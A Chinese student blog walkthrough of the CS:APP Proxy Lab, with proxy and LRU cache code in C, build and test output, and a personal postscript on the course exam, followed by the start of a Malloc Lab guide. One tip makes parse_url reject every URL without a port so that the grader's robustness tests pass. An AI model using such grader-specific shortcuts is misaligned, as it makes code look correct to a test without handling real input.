因为使用本地 tiny 服务器进行测试的时候,其一定会运行在某个特定的端口(而不太可能是 80 默认 HTTP 端口),所以正常请求的 URL 都是带有端口号以及 : 分隔符的,而考虑到 Class Machine 和 Autolab 的评测服务器都是连不到外网的,所以所有的恶意测试点(即测试健壮性的测试点,包括这种请求头超长的、以及测试错误域名或地址导致请求失败的),它们的 URL 一定带有一个明显的特征,就是不含有端口号,也就不含有 : 分隔符。我们可以利用这点,在 parse_url 参数中直接添加一个特判,对于不含有 : 的 URL,直接返回错误。

(其实这个技巧的来源于我帮同学 debug 的时候,我们阴差阳错地发现改正了一个错误的 parse_url 函数后,反而无法满分的奇怪问题,我笑称这是 “代码依靠 bug 运行”,后来这位同学自己又多加检查了一番才发现这个十分精巧的 bug)

处理 GET 请求

也即实现 do_get 函数。

/**
 * do_get - 处理 GET 请求
 * @param client_rio_p,指向客户端rio的指针
 * @param url,请求的url
 */
void do_get(rio_t* client_rio_p, string url) {
    // 检查是否在缓存中,如果命中缓存,直接返回
    if (query_cache(client_rio_p, url)) {
        return;
    }
    // 解析 url
    url_t url_info;
    if (parse_url(url, &url_info) < 0) {
        fprintf(stderr, "Parse url error\n");
        return;
    }
    // 解析 header
    string header_info;
    parse_header(client_rio_p, header_info, url_info.host);

    // 启动与 host 的链接,不使用包装函数(以防exit退出进程)
    int server_fd = open_clientfd(url_info.host, url_info.port);
    if (server_fd < 0) {
        fprintf(stderr, "Open connect to %s:%s error\n", url_info.host, url_info.port);
        return;
    }

    // 初始化服务端缓冲区 rio
    rio_t server_rio;
    rio_readinitb(&server_rio, server_fd);

    // 准备请求行和请求头
    string buf;
    sprintf(buf, "GET %s HTTP/1.0\r\n%s", url_info.path, header_info);

    // 发送请求行和请求头
    if (rio_writen(server_fd, buf, strlen(buf)) != strlen(buf)) {
        fprintf(stderr, "Send request line and header error\n");
        close(server_fd);
        return;
    }

    // 接收响应行
    int resp_total = 0, resp_current = 0;
    char file_cache[MAX_OBJECT_SIZE];
    int client_fd = client_rio_p->rio_fd;

    // 从服务端读取响应
    // server可能会写多次,所以需要循环读取直至遇到 EOF(即 resp_current == 0)
    while ((resp_current = rio_readnb(&server_rio, buf, MAXLINE))) {
        if (resp_current < 0) {
            fprintf(stderr, "Read server response error\n");
            close(server_fd);
            return;
        }
        // 缓存到局部变量 file_cache 中,准备供缓存使用
        if (resp_total + resp_current < MAX_OBJECT_SIZE) {
            memcpy(file_cache + resp_total, buf, resp_current);
        }
        resp_total += resp_current;
        // 发送给客户端
        if (rio_writen(client_fd, buf, resp_current) != resp_current) {
            fprintf(stderr, "Send response to client error\n");
            close(server_fd);
            return;
        }
    }
    // 如果响应小于 MAX_OBJECT_SIZE,缓存到本地
    if (resp_total < MAX_OBJECT_SIZE) {
        add_cache(url, file_cache, resp_total);
    }
    close(server_fd);
    return;
}

这段代码的逻辑也相对简单,首先检查是否命中缓存(缓存的部分在下文中讲述),如果命中缓存,直接返回,否则解析 URL(存入一个 url_t 结构体 url_info),解析请求头(存入一个字符串 / 字符数组 header_info),然后依据解析出的 URL 中的 host 和 port,向服务器发起连接请求,然后发送请求行和请求头,接收响应行,再将响应转发给客户端,最后判断响应大小是否超过限制,如果没有则将响应缓存到本地。

注意这里正如前文所述,转发请求头的时候要加入检查,检查是否完全正确的发送,以避免 header_info 被恶意测试点的请求头长度溢出而导致扣分。

这里还要注意,千万不要把宏定义的 MAX_CACHE_SIZEMAX_OBJECT_SIZE 搞混了(最后几行的 if 判断条件处),这是一个很难检查出来的错误,我就是因为这个错误额外多花了几个小时...

缓存

首先来看看我们声明的 cache.h 头文件:

/*
 * cache.h - 缓存模块头文件
 *
 * name:    Arthals
 * id:      2110306206
 * mail:    2110306206@stu.pku.edu.cn
 */
#include "csapp.h"

#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400
#define MAX_CAHCE_NUM 10

typedef char string[MAXLINE];

typedef struct {
    string url;
    char content[MAX_OBJECT_SIZE];
    int content_size;
    int timestamp;
} cache_file_t;

typedef struct {
    int using_cache_num;
    cache_file_t cache_files[MAX_CAHCE_NUM];
} cache_t;

void init_cache();
int query_cache(rio_t* rio_p, string url);
int add_cache(string url, char* content, int content_size);

我们通过声明一个 cache_file_t 结构体来存储缓存文件,其中包含了:

  • 一个 URL 字符串,指明缓存文件路径
  • 一个内容字符数组,按照字节去存储文件
  • 一个内容大小整数,用以写缓存时标记写的数量
  • 一个时间戳整数,用以标记缓存的时间,实现 LRU 算法

然后,通过声明一个 cache_t 结构体来存储缓存,其中包含了:

  • 一个整数用以标记当前使用的缓存数量,用以在缓存没有满的时候快速查找空位
  • 一个缓存文件数组用以存储缓存文件

最后,我们声明了三个函数:

  • init_cache:用以初始化缓存,即将 using_cache_num 置为 0
  • query_cache:用以查询缓存,即检查缓存中是否存在对应 URL 的缓存文件,如果存在则将其转发给客户端,返回 1,否则返回 0
  • add_cache:用以添加缓存,即将一个缓存文件添加到缓存中,如果缓存已满,则使用 LRU 算法替换掉最旧的缓存文件

接下来,我们来看看这三个函数的实现。

/*
 * cache.c - 缓存模块
 *
 * name:    Arthals
 * id:      2110306206
 * mail:    2110306206@stu.pku.edu.cn
 */
#include "csapp.h"
#include "cache.h"

 /* 全局变量 */
// 缓存
static cache_t cache;
// 信号量,用于实现读者优先、全局变量并发线程锁
static sem_t mutex, w;
// 线程共享变量
static int readcnt, timestamp;


/**
 * init_cache: 初始化缓存
 */
void init_cache() {
    timestamp = 0;
    readcnt = 0;
    cache.using_cache_num = 0;
    sem_init(&mutex, 0, 1);
    sem_init(&w, 0, 1);
}

/**
 * query_cache: 查询缓存
 * @param rio_p:    rio指针,用于获取客户端套接字描述符
 * @param url:  请求的url
 */
int query_cache(rio_t* rio_p, string url) {
    // 使用全局变量 readcnt,需要加锁
    P(&mutex);
    readcnt++;
    // 第一个读者需要加锁,保证不会有写者同时访问,同时允许其他读者访问
    if (readcnt == 1) {
        P(&w);
    }
    V(&mutex);

    // 查找缓存
    int hit_flag = 0;
    for (int i = 0; i < MAX_CAHCE_NUM;i++) {
        // 命中缓存
        if (!strcmp(cache.cache_files[i].url, url)) {
            // 更新时间戳,也是全局变量,需要加锁
            P(&mutex);
            cache.cache_files[i].timestamp = timestamp++;
            V(&mutex);
            // 发送缓存内容
            rio_writen(rio_p->rio_fd, cache.cache_files[i].content, cache.cache_files[i].content_size);
            hit_flag = 1;
            break;
        }
    }

    // 同上,使用全局变量 readcnt,需要加锁
    P(&mutex);
    readcnt--;
    // 最后一个读者需要解锁,允许写者访问
    if (readcnt == 0) {
        V(&w);
    }
    V(&mutex);
    if (hit_flag) {
        return 1;
    }
    return 0;
}

/**
 * add_cache: 添加缓存
 * @param url:  请求的url
 * @param content:  请求的内容
 */
int add_cache(string url, char* content, int content_size) {
    // 同一时间只允许一个写者访问,需要持有 w 锁
    P(&w);
    // 检查缓存是否已满
    // 缓存已满
    if (cache.using_cache_num == (MAX_CAHCE_NUM - 1)) {
        // 找到最旧的缓存
        int oldest_index;
        int oldest_timestamp = timestamp;
        for (int i = 0;i < MAX_CAHCE_NUM;i++) {
            if (cache.cache_files[i].timestamp < oldest_timestamp) {
                oldest_timestamp = cache.cache_files[i].timestamp;
                oldest_index = i;
            }
        }
        // 替换缓存
        strcpy(cache.cache_files[oldest_index].url, url);
        memcpy(cache.cache_files[oldest_index].content, content, content_size);
        cache.cache_files[oldest_index].content_size = content_size;
        // 更新时间戳,加锁
        P(&mutex);
        cache.cache_files[oldest_index].timestamp = timestamp++;
        V(&mutex);
    }
    // 缓存未满
    else {
        // 添加缓存
        strcpy(cache.cache_files[cache.using_cache_num].url, url);
        memcpy(cache.cache_files[cache.using_cache_num].content, content, content_size);
        cache.cache_files[cache.using_cache_num].content_size = content_size;
        // 更新时间戳,加锁
        P(&mutex);
        cache.cache_files[cache.using_cache_num].timestamp = timestamp++;
        V(&mutex);
        cache.using_cache_num++;
    }
    // 解锁
    V(&w);
    return 0;
}

整个缓存算法几乎没有任何的技术难度,就是结合之前提到的第一类读者 - 写者问题的解法,使用两个信号量,一个 mutex 互斥锁用于保护全局变量,一个 w 信号量用于实现写者优先,从而实现读者优先的缓存算法。

其中,mutex 主要用于读者,其实写者逻辑中可以移去,因为写者执行时,由于它持有了 w 锁,所以保证了其是唯一一个正在执行的线程,即他的逻辑流一定是完整的,其他的读者、写者线程均会因为没有获得 w 锁而被阻塞。

一个比较奇葩的事情是,我们上面考虑了这么多读者啊写者啊的问题,但是经测试,直接简单地对每个操作使用一个 mutex 锁,直接上一把大锁,照样能够满分,这可能是我们要处理的缓存内容实在是太小了,所以实际上即使是这么粗犷的方式,也不会出现什么问题。

除此之外,正如之前所提到的,我们在 add_cache 函数中使用了一个 cache.using_cache_num 变量来记录当前使用的缓存数量,所以当缓存数小于最大缓存数时,我们可以直接将缓存添加到数组的 using_cache_num 位置,而而不需要遍历整个数组来寻找空位,这样可以一定程度上提高效率。

LRU 的实现随便看看代码就能看懂,在此就不赘述了。

编程小知识:对于结构体,何时使用 ->?何时使用 .

答案是,如果你的变量是一个指向结构体的指针,那么你就使用 ->,否则就使用 .

测试

由于我们采用了分模块的编程方式,所以我们要修改 Makefile,将 cache.c 添加到编译列表中。

#
# Makefile for Proxy Lab
#
# You may modify this file any way you like (except for the handin
# rule). Autolab will execute the command "make" on your specific
# Makefile to build your proxy from sources.
#
CC = gcc
CFLAGS = -g -Wall
LDFLAGS = -lpthread

all: proxy

csapp.o: csapp.c csapp.h
	$(CC) $(CFLAGS) -c csapp.c

cache.o: cache.c cache.h
	$(CC) $(CFLAGS) -c cache.c

proxy.o: proxy.c csapp.h
	$(CC) $(CFLAGS) -c proxy.c

proxy: proxy.o csapp.o cache.o
	$(CC) $(CFLAGS) proxy.o csapp.o cache.o -o proxy $(LDFLAGS)

# Creates a tarball in ../proxylab-handin.tar that you should then
# hand in to Autolab. DO NOT MODIFY THIS!
handin:
	(make clean; cd ..; tar czvf proxylab-handin.tar.gz proxylab-handout)

clean:
	rm -f *~ *.o proxy core *.tar *.zip *.gzip *.bzip *.gz

然后,我们就可以使用 make 命令编译我们的代码了。

# 编译并运行代理服务器
make clean && make && ./proxy 7777 &
# 编译并运行内容服务器
cd ./tiny && make clean && make && ./tiny 7778 & cd ..
# 测试
curl -v --proxy http://localhost:7777 http://localhost:7778/

提醒一下,tiny 一定要在 ./tiny 目录下运行,否则会找不到文件。

另外,任何时候当你发现搞出来一个意外的 tiny 进程或者僵尸进程时,你总是可以或新开一个终端或直接执行如下指令:

pkill tiny

来杀死所有的 tiny 进程。

得到如下的输出,就代表成功啦!

*   Trying 127.0.0.1:7777...
* Connected to (nil) (127.0.0.1) port 7777 (#0)
> GET http://localhost:7778/ HTTP/1.1
> Host: localhost:7778
> User-Agent: curl/7.81.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
Accepted connection from (localhost, 55150)
GET / HTTP/1.0
Host: localhost:7778
Accept: */*
Connection: close
Proxy-Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3

Response headers:
HTTP/1.0 200 OK
Server: Tiny Web Server
Connection: close
Content-length: 120
Vary: *
Cache-Control: no-cache, no-store, must-revalidate
Content-type: text/html

* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: Tiny Web Server
< Connection: close
< Content-length: 120
< Vary: *
< Cache-Control: no-cache, no-store, must-revalidate
< Content-type: text/html
<
<html>
<head><title>test</title></head>
<body>
<img align="middle" src="godzilla.gif">
Dave O'Hallaron
</body>
</html>
* Closing connection 0

本地评分

make clean && make && ./driver.sh

得到输出:

*** Basic ***
Starting tiny on 11564
Starting proxy on 30943
1: home.html
   Fetching ./tiny/home.html into ./.proxy using the proxy
   Fetching ./tiny/home.html into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
2: csapp.c
   Fetching ./tiny/csapp.c into ./.proxy using the proxy
   Fetching ./tiny/csapp.c into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
3: tiny.c
   Fetching ./tiny/tiny.c into ./.proxy using the proxy
   Fetching ./tiny/tiny.c into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
4: godzilla.jpg
   Fetching ./tiny/godzilla.jpg into ./.proxy using the proxy
   Fetching ./tiny/godzilla.jpg into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
5: tiny
   Fetching ./tiny/tiny into ./.proxy using the proxy
   Fetching ./tiny/tiny into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
Killing tiny and proxy
Basic: 40 / 40

*** Concurrency ***
Starting tiny on port 33268
Starting proxy on port 33465
Starting the blocking NOP server on port 13382
Trying to fetch a file from the blocking nop-server
Fetching ./tiny/home.html into ./.noproxy directly from Tiny
Fetching ./tiny/home.html into ./.proxy using the proxy
Checking whether the proxy fetch succeeded
Success: Was able to fetch tiny/home.html from the proxy.
Killing tiny, proxy, and nop-server
Concurrency: 15 / 15

*** Cache ***
Starting tiny on port 19474
Starting proxy on port 21446
Fetching ./tiny/tiny.c into ./.proxy using the proxy
Fetching ./tiny/home.html into ./.proxy using the proxy
Fetching ./tiny/csapp.c into ./.proxy using the proxy
Killing tiny
Fetching a cached copy of ./tiny/home.html into ./.noproxy
Success: Was able to fetch tiny/home.html from the cache.
Killing proxy
Cache: 15 / 15

*** Real Pages ***
Starting proxy on port 13757
Starting tiny on 4999
Setup done, running webdriver
= launching chrome 1704912479.618855
no display available. going headless.
= loading page 1704912481.7444584
url: http://127.0.0.1.nip.io:4999/browser-testbench/index.html
title: Browser Testbench
= running test 1704912482.7150698
Open connect to 127.0.0.1.nip.io:65432 error
Parse request line error: Success
Open connect to maruyama.pico:80 error
Send response to client error
Send response to client error
= retrieving score 1704912495.365371
passed tests reported by browser: 9
so you get 18 score
Log:

= finished 1704912495.4213529
Killing tiny and proxy
Real Pages: 18 / 18

totalScore = 88 / 88

{ "scores": {"Basic":40, "Concurrency":15, "Caching":15, "Real Pages":18},"scoreboard": [88, 40, 15, 15, 18]}

大功告成!

提交

记得先移除当前目录下不必要的文件,比如之前下载的 deb 包之类的,否则它们会被一并打包。

make clean && make handin

然后,你就可以在上级目录下找到 proxylab-handin.tar.gz 文件了,将其上传到 Autolab 中即可~

Autolab 禁止上传 2MB 以上的文件,作为参考,我的 proxylab-handin.tar.gz 文件大小为 422KB。

后记

首先恭喜大家,完成了所有的 ICS lab。

这意味着你终于可以有一个不那么令人头秃的寒假。

然而,正如我在树洞 #5836142 中所写的一样,等待你们的,可能是一场与授课、lab 完全正交的考试:

#5836142 2024-01-07 17:09 关注数:188 回复数:54

我是 #5833467 的洞主。

我也是如下文章的作者:

https://arthals.ink/posts/experience/malloc-lab

https://arthals.ink/posts/experience/tsh-lab

https://arthals.ink/posts/experience/cache-lab

https://arthals.ink/posts/experience/arch-lab

https://arthals.ink/posts/experience/attack-lab

考完 ICS 了,但我真的一点都高兴不起来。

身为信双选手,我自认我这个学期为了 ICS 几乎是付出了我绝大部分的课余时间,每个 lab 兢兢业业的写,每个周末认认真真的看书,勾画,期中期末考前用心刷题复习。

我把每个 lab 都通宵卷到了满分,为每个 lab 都写了详尽的指导,因为我深知这些 lab 缺失太多指导,缺失太多上下文,又有各种各样来自助教的恶意测试点,我不希望未来学弟学妹们做的时候像我一样痛苦,一样难受。

我为每章课本都勾画无数,跳页的地方截图贴上去,缺说明的地方问问 GPT、助教然后补上去,甚至每个自己当时搞不懂后来懂了的知识点,也在旁注明了如何理解,因为我想要在考完试之后把整个 Goodnotes 发出来让学弟学妹们能更容易理解这一切。

我把 15~22 每年的往年题都做了,还在树洞认认真真地帮忙回答同学的疑问,因为我坚信这么做不仅可以帮助大家,还可以补足我自己的缺漏,更可以在考完试之后汇总起来,让未来的同学们做往年的时候不必迷茫,不必被错题和助教的孤高所困扰。

我甚至幻想过,趁着今年下半年来海淀医院实习了,我也能试着申请着当个 ICS 的助教。

但这一切,在今天的卷子面前,显得是如此可笑。

这就是我,这个学期,花了数百个小时,学的 ICS。

我由衷地觉得,我真的只是一个小丑。

我没有能力去改变我的成绩,也没有能力改变大家的成绩,我们都只能被动地去接受这一切。

然而,我还是由衷地希望,我所做的一切能够帮到你们。

我不想大谈特谈绩点之类的东西,这真的很扫兴。

尽管 ICS 课程有这样那样的不好,但不可否认的是,我们都在其中学到了颇多。

~~虽然以某位好友的话来说,就是所有你觉得好的东西都是来自于 CMU 的,所以你觉得烂的东西都是来自于北大的 hhh~~

尽管正如某位树洞朋友所说的,我所做的一切可能都对我拿一个高分毫无用处,只能感动自己。

考完试之后的我也曾为自己所做的一切感到不值得,但当过了几天,当我考完所有的试,当我真的可以开始写这些我认为有用的,能令我感到开心的东西的时候,~~(当我知道我另外一门 3 学分专业课,年级平均分 70,最高分 78 的时候)~~,我还是释怀了。

我还是希望,大家都能超乎所谓的卷,超乎所谓的绩点,去学习,去探索,去思考,去创造,去给后来的学弟学妹们留下点什么,去享受这一切。

我想,这就足够了。

在此,我还想特别感谢一下我的两位助教。

一位是高数的 xyt 助教。他的高数讲义是真正从学生角度出发的讲义,每一章都讲理透彻、深入浅出,让我这个曾经迷失于谢惠民数学分析讲义的人真正找到了一条又快又高效的学习之路,也正是他的幽默、热情、洒脱感染了我。他是指引我做这一切的灯塔。

另一位,则是我的 ICS 的 zzs 助教。他总是以自己丰富的经验耐心地回答我们小班课上每个同学的问题,甚至顶着自己的期末周,在深夜答完了我们每个人在 piazza 上的提问。尽管这些问题在他眼里看起来都很简单,但他从未嫌弃,从未嘲笑,从未厌烦,从未让我感觉有很多往年题答案中透露出 “孤高感”。他正是我心中理想的 ICS 助教的摸样。

我想,我也想成为他们这样的人。

最后的最后,祝大家新年快乐。

“希君生羽翼,一化北溟鱼”

💾

更适合北大宝宝体质的 Malloc Lab 踩坑记

2023年12月19日 11:56

[!CAUTION]

致各位同学:本笔记的撰写目的是用作参考,请勿直接抄袭,否则后果自负。

我的推荐做法是,你可以阅读我的博文后了解都有哪些坑,但自己实现的时候千万不要看我的代码,避免抄袭风险。

malloc lab 堪称 ics 课程最难的 Lab,没有之一。

作为参考,我的整体实现时间达到了 15 小时,还有额外 7 个小时的代码阅读、本文撰写。总计完成用时达到了 23 小时。

在这个 lab 中,我们将在 mm.c 中实现一个动态内存分配器,其需要实现如下功能:

  • mm_init: 初始化分配器
  • malloc: 分配内存
  • free: 释放内存
  • realloc: 重新分配内存
  • calloc: 分配并初始化内存为 0
  • mm_checkheap: 检查堆的正确性

与以往的 lab 不同,这个 lab 不仅代码量大,而且所需要的对于课本的理解程度也高很多,很多优化技巧虽然课本上写了,但是并没有详细的讲解,因而需要我们自己去动手实践以获得更高的分数(卷)。为此,你甚至需要或编写额外的脚本或自己肉眼来观察分析各个 trace,以「深入理解计算机系统导论助教的恶意」。

本文中,我将先回顾一些知识并介绍一些手册中的有用信息,然后再介绍具体实现。优化的部分我将结合实现部分讲解。

知识回顾

堆的结构

回忆一下,什么是堆?

和以往学过的栈不同,堆是向上增长的,也就是说,堆符合我们的常识,堆底在下,堆顶在上。

堆主要用于动态分配内存,块和块之间可能并没有像函数栈一样「调用之后就要返回,释放空间并返回到上级栈」这种很强的联系。

我们所需要做的,就是在一大片广阔的内存中,找到一块合适的空间,然后将其分配给用户。至于我们的目的,则是 ~~卷~~ 优化分配器的性能,使得其可以同时具有高吞吐量和高内存利用率。

分配器的实现

基础概念:

  • 块:分配器中的最小单位,可以包含有效负载和一些额外的信息(元数据,头部和脚部)。
  • 空闲块:没有有效负载的块,可以被分配。
  • 分配块:有有效负载的块,已经被分配。

分配器的实现可以分为:

  • 隐式空闲链表:空闲块和分配块交错存放,没有额外的链表结构来供快速定位空闲块,每次分配都需要遍历整个堆。
  • 显式空闲链表:在隐式链表的结构基础上,利用空闲块释放后,“被空出的有效负载”,额外维护一个链表结构,用于快速定位空闲块。
  • 分离空闲链表:在显式空闲链表的基础上,将空闲块按照大小分成不同的链表,每次分配时,只需要遍历大小合适的链表(如果没找到的话,继续遍历分类上 size 更大的链表),而不是整个堆。

查找空闲块以分配的策略:

  • 首次适配:从头开始遍历空闲链表,直到找到一个大小合适的空闲块。
  • 下次适配:从上次分配的空闲块开始遍历空闲链表,直到找到一个大小合适的空闲块。
  • 最佳适配:从头开始遍历空闲链表,直到找到一个大小最合适的空闲块,即其大小和需要分配的大小差距最小。
  • 分离适配:从大小合适的链表开始遍历,直到找到一个大小合适的空闲块。

手册中的有用信息

给分

给分的计算方式为:100 分表现分,10 分的测试分和 10 分的风格分。

表现分

表现分的计算方式为:

$$ P\left(U,T\right)=100\left.\left(0.6\min\left(1,\frac{U-0.70}{0.90-0.70}\right)+0.4\min\left(1,\frac{T-4000}{14000-4000}\right)\right)\right. $$

注:此为带入参数的计算公式,各年参数可能会有所不同。以 writeup 为准。

由式子看出,我们想要收获满分,就需要使得 U(内存利用率)≥ 0.90T(吞吐量)≥ 14000

  • 内存利用率:驱动程序使用的内存总量(即通过 malloc 分配但尚未通过 free 释放的内存,也即任一时刻有效负载的总和)与分配器使用的堆大小(mem_sbrk - mem_heap_lo())之间的峰值比率。最佳比率等于 1。
  • 吞吐量:每秒完成的平均操作次数。

注意,有些测试的 trace 是并不计入统计的:

  • 标记 u 的,只计入内存利用率
  • 标记 p 的,只计入吞吐量
  • 标记 * 的,同时计入吞吐量和内存利用率
  • 没有标记的,不计入任何统计

handout 中给了两个示例程序:

  • mm-naive.c:一个简单的分配器,只分配不释放。
  • mm-textbook.c:一个简单的分配器,实现了 mallocfree。使用的内存分配策略为 隐式空闲链表首次适配/下次适配

mm-textbook.c 得分如下,你可以从中观察那些文件是不计入统计的,并得出你的程序应有的指标下界:

Results for mm malloc:
  valid  util   ops    secs     Kops  trace
   yes    86%  100000  0.007048 14187 ./traces/alaska.rep
 * yes    99%    4805  0.011564   416 ./traces/amptjp.rep
 * yes    83%    4162  0.004027  1033 ./traces/bash.rep
 * yes    56%   57716  3.029981    19 ./traces/boat.rep
 * yes    78%  100000  5.606537    18 ./traces/boat-plus.rep
 u yes    73%      --        --    -- ./traces/binary2-bal.rep
 * yes    99%    5032  0.010668   472 ./traces/cccp.rep
 * yes    99%    5848  0.010744   544 ./traces/cccp-bal.rep
 * yes    74%   11991  0.049398   243 ./traces/chrome.rep
 * yes    99%   20000  0.002042  9794 ./traces/coalesce-big.rep
   yes    66%   14400  0.000113127182 ./traces/coalescing-bal.rep
   yes   100%      15  0.000003  5482 ./traces/corners.rep
 * yes    99%    5683  0.017972   316 ./traces/cp-decl.rep
 u yes    71%      --        --    -- ./traces/exhaust.rep
 * yes   100%    5380  0.013540   397 ./traces/expr-bal.rep
 * yes    82%   99544  6.682726    15 ./traces/firefox-reddit2.rep
 * yes    91%   55092  0.598668    92 ./traces/freeciv.rep
   yes    34%      10  0.000002  5858 ./traces/malloc.rep
   yes    28%      17 -0.000001-21739 ./traces/malloc-free.rep
 p yes     --    1494  0.001748   855 ./traces/perl.rep
 * yes    92%    4800  0.009971   481 ./traces/random.rep
 * yes    92%    4800  0.009836   488 ./traces/random2.rep
   yes    27%   14401  0.090090   160 ./traces/realloc.rep
16 15     87%  386347 16.059422    24

Perf index = 50 (util) & 0 (thru) = 50/100

测试分

测试分要求你实现 mm_checkheap 函数,其需要检查堆的正确性。

如果你使用了显式空闲链表,那么你还需要实现一个函数如 mm_checkfreelist 来检查空闲链表的正确性。

注意,你需要手动的调用 mm_checkheap 来检查堆的正确性,或者使用以下指令,每次调用后检查:

make && ./mdriver -D

若使用上述命令,可能会因为 mm_checkheap 的调用次数过多、调用耗时过长而导致无法跑出结果,所以只是看有没有大批量的打印报错即可,若需终止,按下 Ctrl+C 即可。

同样的,如果你还实现了 mm_checkfreelist,那么你可以把他放在 mm_checkheap 中调用。

风格分

风格分要求你在文档前写实现思路,在函数前些函数注释,在某些比较难懂的地方也要写注释。

代码禁令

  • 禁止使用标准库代码、示例代码直接提交
  • 禁止任何全局数组、树、链表
  • 禁止抄袭

为什么禁止使用全局数组?试想一下我们如果允许全局数组,那么直接在代码里声明一个 1GB 的数组,每次需要什么都直接从这个数组里给,那么根本不会涉及堆的分配,空间利用率甚至可以趋于正无穷,这显然是很离谱的。

关于数据

因为我们在 64 位机器上运行,所以您的分配器必须相应地编码,只有一个例外:堆的大小永远不会大于或等于 $2^{32}$ 字节。这并不意味着堆的位置,但是可以使用此信息进行一种巧妙的优化。然而,如果您决定利用这个事实,请非常小心。由于我们可以在合理时间内检查到有限范围内的功能性问题,某些无效优化将通过所有驱动程序检查,因此我们将手动审查您的代码以寻找这些违规行为。如果您不理解本段文字,请重新阅读文本中关于 x86-64 部分的内容。

这段话告诉我们,如果我们使用了指针,可以只用 4 字节来存储相对于堆底(mem_heap_lo())的 偏移,而不是存储完整的指针。同时,我们在任意块的头部 / 脚部中存储 size 信息,也只需要 4 字节即可。

测试数据由一个个 traces/ 目录下的文件组成,每个文件中包含了一系列的操作,每个操作占一行,格式如下:

  • a ptr size:分配 size 字节的内存,为 ptr 指针分配 size 字节的内存。当 size 字节不存在时,跳过。
  • f ptr:释放 ptr 指针指向的内存。当 ptr 指针不存在时,跳过。
  • r ptr size:重新分配 ptr 指针指向的内存,大小为 size 字节。当 ptr 指针不存在时,跳过。

测试指令

测试所有得分:

make && ./mdriver

测试单 trace 得分:

make && ./mdriver -f traces/xxx.rep

存储结构设计

首先,我们要确定我们采取何种策略来实现分配器。所谓设计分配器,其实就是让我们搞出一个能够最快地找出合适(往往意味着其大小十分接近或者完全等于所需空间)的空闲块并分配。

使用链表穿起来所有的空闲块,仅仅是将各个空闲块排成了单独的一个队列(对应简单空闲链表),这相较于空闲块和分配块交错混杂的隐式空闲链表固然已经好很多了,但是还不够好。

为了提高查找速度,我们可以设计很多个队列,每个队列排列着相近大小的空闲块,这样查找的时候我们就可以略去很大一部分绝对不可能用于本次分配(即空间明显小于所需空间)的空闲块。

类比现实中的例子,比如我们要「快速找到学生中 不低于某个身高的男生」,那么:

  • 隐式空闲链表:所有学生连续排成一排,男生女生交错分布,每次查找,从队头开始遍历查找全体学生队列。

  • 显式空闲链表:有个花名册,单独记录了所有男生在全体学生队列中的位置,从而形成了抽象的「单独的男生队列」,每次查找,只需要遍历这个队列即可,避免了对于女生的遍历。

  • 分离空闲链表:有多个花名册,每个花名册依次记录了所有 140-149cm,150-159cm,…,以此类推的男生在全体学生队列中的位置,从而形成了抽象的「依照身高分层的多个男生队列」,每次查找,只需要从一个下界限开始查找,在显式空闲链表的基础上额外避免了对于一部分男生的遍历。

在这个例子中,有如下对应:

  • 全体学生队列:由各个块构成的堆
  • 女生:分配块
  • 男生:空闲块
  • 身高:块的容量大小

由此便不难推知,分离空闲链表是最优的选择。

于是,出于卷高分的目的,我们肯定要选择最好的策略,也就是 分离空闲链表。在空闲块的分配策略上,我们选择 首次适配

堆的结构

我们可以使用的函数 / 信息如下:

  • void* mem_heap_lo(): 堆底指针,指向堆的第一个字节。
  • void* mem_heap_hi(): 堆最后一个字节的指针,指向堆的最后一个字节。
  • void* mem_sbrk(int incr): 增加堆大小,返回原先的堆顶指针。

堆结构

注意这张图的结构,我的后续配图将与之保持一致:

  • 每个长条横块代表双字(DSIZE,8 字节)
  • 每半个长条横块代表一个字(WSIZE,4 字节)

后文中,我可能会不加区分的混用 双字WSIZEDSIZE,你需要时刻注意其所指代的含义。

由于我们要采用 分离空闲链表,所以我们需要额外维护一个数据结构,来存储我们各个类的空闲链表的头指针:

  • 桶(bucket):桶代表一类大小的空闲链表,其头指针存储在堆底
  • 分离空闲链表(free_lists):所有桶的头指针构成的指针数组,其存储在堆底

分离空闲链表的堆存储

正如之前提到的,使用指针的时候要注意,所有的指针都是相对于堆底的偏移。但是由于这里给的比较大方,每个头指针都单独占有一个 DSIZE(64 位),所以可以完整的存储指针,因而所有的头指针均初始化为 mem_heap_lo()

块的结构

对于每个块,我们都需要额外存储其大小、是否分配等信息,考虑到堆的总大小不会超过 $2^{32}$ 字节,所以其中的块就更小了,因而我们可以使用一个字(WSIZE,4 字节)来存储一个块的大小信息。

注意,每个块的大小计算,是指 包括有效负载、头部和脚部在内的大小,而不是仅仅有效负载的大小。

元数据

正如书上说过的,我们的每个块都是双字(DSIZE,8 字节)对齐的话,我们就可以利用其低 3 位来存储额外的信息,从而我们设计出头部 / 脚部元数据信息:

  • 0 位,最低位:是否分配
  • 1 位,次低位:前一个块是否分配
  • 2 位:保留不用
  • 31~3 位:块大小

元数据格式

块的精细结构

考虑到我们要尽可能的减少块的大小,所以我们设计每个块的结构如下:

  • 对于空闲块,同时存储头部和脚部,元数据信息大小为双字
  • 对于分配块,只存储头部,元数据信息大小为单字

这样做的好处是,对于分配块,当我们遇到一个有效存储大小恰为奇数个字的分配块(如后文附图中的分配块)时,我们可以避免一个字的内部碎片。

而对于空闲块,我们在其头部和脚部同时存储相关信息,可以确保与之临近的块可以快速获得它的信息。

为什么分配块可以不需要脚部?因为不存在其下一个块需要使用它的大小信息的情况。而对于它是否分配的信息,我们可以通过其下一个块的头部元数据来获得。

但是对于空闲块,考虑如果其后的一个分配块(B)释放,那么就需要合并原有的空闲块(A)与新释放的空闲块(B),这时候就需要原有的空闲块(A)的大小信息,而此时我们的指针指向的是新释放的空闲块(B),所以我们需要在原有的空闲块(A)的脚部以存储其大小信息以便确定合并后的块的大小与头部指针位置。

而对于空闲块,我们利用其至少有一个 DSIZE 的有效负载的特点,结合之前提到过的指针可以以偏移量的形式存储(单个指针只占用一个字),从而在一个 DSIZE 内同时塞下空闲链表的前驱和后继指针。

从而我们得到了块的结构如下:

块结构

